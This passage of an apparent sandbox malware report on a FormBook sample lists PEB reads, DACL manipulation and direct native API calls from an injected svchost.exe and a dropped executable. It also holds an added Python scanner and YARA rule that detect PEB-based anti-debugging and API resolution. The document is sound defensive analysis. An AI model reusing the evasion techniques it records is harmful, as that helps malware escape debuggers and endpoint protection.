            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC460 mov ecx, dword ptr fs:[00000030h]1_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEBD0 mov eax, dword ptr fs:[00000030h]1_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EBFC mov eax, dword ptr fs:[00000030h]1_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCBF0 mov eax, dword ptr fs:[00000030h]1_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEB50 mov eax, dword ptr fs:[00000030h]1_2_039DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB40 mov eax, dword ptr fs:[00000030h]1_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8B42 mov eax, dword ptr fs:[00000030h]1_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CB7E mov eax, dword ptr fs:[00000030h]1_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968A90 mov edx, dword ptr fs:[00000030h]1_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04A80 mov eax, dword ptr fs:[00000030h]1_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986AA4 mov eax, dword ptr fs:[00000030h]1_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AD0 mov eax, dword ptr fs:[00000030h]1_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCA11 mov eax, dword ptr fs:[00000030h]1_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA24 mov eax, dword ptr fs:[00000030h]1_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA2E mov eax, dword ptr fs:[00000030h]1_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEA60 mov eax, dword ptr fs:[00000030h]1_2_039DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov esi, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h] (10 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039C69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039BC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03928918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039B892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039C892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039B0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039BC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03956962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0397096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039BC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03930887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0395E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039FA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039BC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03952835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03952835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0396A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03960854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03934859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03942840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039BE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039C6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03962F98 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0396CF80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03A04FE7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FD81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FAA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FAA2A4 SetUnhandledExceptionFilter
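The `mov eax, dword ptr fs:[00000030h]` entries above are reads of the PEB pointer: in a 32-bit process the FS segment base is the TEB, TEB+0x30 holds the PEB address, and inside the PEB offset 0x02 is `BeingDebugged` while offset 0x0C is `Ldr`, the loader's module list (used for manual API resolution). The scanner below is an added example, not part of the Joe Sandbox report or of the sample, that finds the same instruction pattern statically in raw 32-bit x86 code and inspects the next instruction to tell a debugger check from a loader-list walk. The byte string it scans is constructed for the example; the follow-up patterns it recognises (`movzx`/`cmp` on [reg+2], `mov` from [reg+0Ch]) are assumptions about what commonly follows the read, and a base register of esp is not handled.

```python
"""
Static scan of 32-bit x86 code for the PEB/TEB reads that the sandbox reports as
'mov eax, dword ptr fs:[00000030h]'.  fs:[0x30] is the PEB pointer in a 32-bit
process; fs:[0x18] is the TEB self-pointer.  For PEB reads the next instruction is
checked to distinguish a BeingDebugged test (PEB+2) from a loader-list walk (PEB+0xC).
"""
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
FS_OFFSETS = {0x18: "TEB self-pointer", 0x30: "PEB"}


def classify_use(code, pos, reg):
    """Classify the instruction at `pos` that follows a PEB load into register `reg`.

    Assumed follow-ups (example's own heuristics); esp as base (needs SIB) is ignored.
    """
    if pos + 4 > len(code):
        return "PEB (unclassified)"
    b0, b1, b2, b3 = code[pos:pos + 4]
    # movzx r32, byte ptr [reg+2]  -> 0F B6 /r with mod=01, rm=reg, disp8=02
    if b0 == 0x0F and b1 == 0xB6 and (b2 & 0xC7) == (0x40 | reg) and b3 == 0x02:
        return "PEB.BeingDebugged"
    # cmp byte ptr [reg+2], 0      -> 80 /7 with mod=01, rm=reg, disp8=02, imm8=00
    if (b0 == 0x80 and (b1 & 0xC7) == (0x40 | reg) and ((b1 >> 3) & 7) == 7
            and b2 == 0x02 and b3 == 0x00):
        return "PEB.BeingDebugged"
    # mov r32, [reg+0Ch]           -> 8B /r with mod=01, rm=reg, disp8=0C
    if b0 == 0x8B and (b1 & 0xC7) == (0x40 | reg) and b2 == 0x0C:
        return "PEB.Ldr (module list walk)"
    return "PEB (unclassified)"


def find_fs_reads(code):
    """Return [(offset, register, fs_offset, purpose)] for each mov r32, fs:[disp32]."""
    hits, i, n = [], 0, len(code)
    while i < n:
        if code[i] != 0x64:                        # FS segment-override prefix
            i += 1
            continue
        reg = None
        if i + 6 <= n and code[i + 1] == 0xA1:     # 64 A1 disp32: mov eax, fs:[disp32]
            reg, disp, ln = 0, struct.unpack_from("<I", code, i + 2)[0], 6
        elif i + 7 <= n and code[i + 1] == 0x8B and (code[i + 2] & 0xC7) == 0x05:
            # 64 8B /r disp32 with mod=00, rm=101: mov r32, fs:[disp32]
            reg, disp, ln = (code[i + 2] >> 3) & 7, struct.unpack_from("<I", code, i + 3)[0], 7
        if reg is None or disp not in FS_OFFSETS:
            i += 1
            continue
        purpose = FS_OFFSETS[disp]
        if disp == 0x30:
            purpose = classify_use(code, i + ln, reg)
        hits.append((i, REG32[reg], disp, purpose))
        i += ln
    return hits


def yara_rule():
    """Equivalent YARA rule for the same byte patterns (every r32 except esp)."""
    return (
        "rule x86_peb_read_fs30 {\n"
        "  strings:\n"
        "    $a = { 64 A1 30 00 00 00 }                          // mov eax, fs:[30h]\n"
        "    $b = { 64 8B (05|0D|15|1D|2D|35|3D) 30 00 00 00 }   // mov r32, fs:[30h]\n"
        "  condition:\n"
        "    uint16(0) == 0x5A4D and any of them\n"
        "}\n"
    )


# Constructed sample (not taken from the report): three FS reads with different follow-ups.
SAMPLE = bytes.fromhex(
    "64A130000000"    # mov eax, fs:[30h]
    "0FB64002"        # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    "85C0"            # test eax, eax
    "648B0D30000000"  # mov ecx, fs:[30h]
    "8B410C"          # mov eax, [ecx+0Ch]            ; PEB.Ldr
    "648B1518000000"  # mov edx, fs:[18h]             ; TEB self-pointer
    "C3"              # ret
)

if __name__ == "__main__":
    for off, reg, disp, purpose in find_fs_reads(SAMPLE):
        print(f"{off:#06x}: mov {reg}, fs:[{disp:#x}]  ->  {purpose}")
    print(yara_rule())
```

Run it over a dumped code section (the `.unpack` files the report lists are the natural input) rather than over a packed file on disk; the pattern only appears after the FormBook payload has been unpacked in memory.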

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  NtCreateUserProcess: Direct from: 0x76F0371C
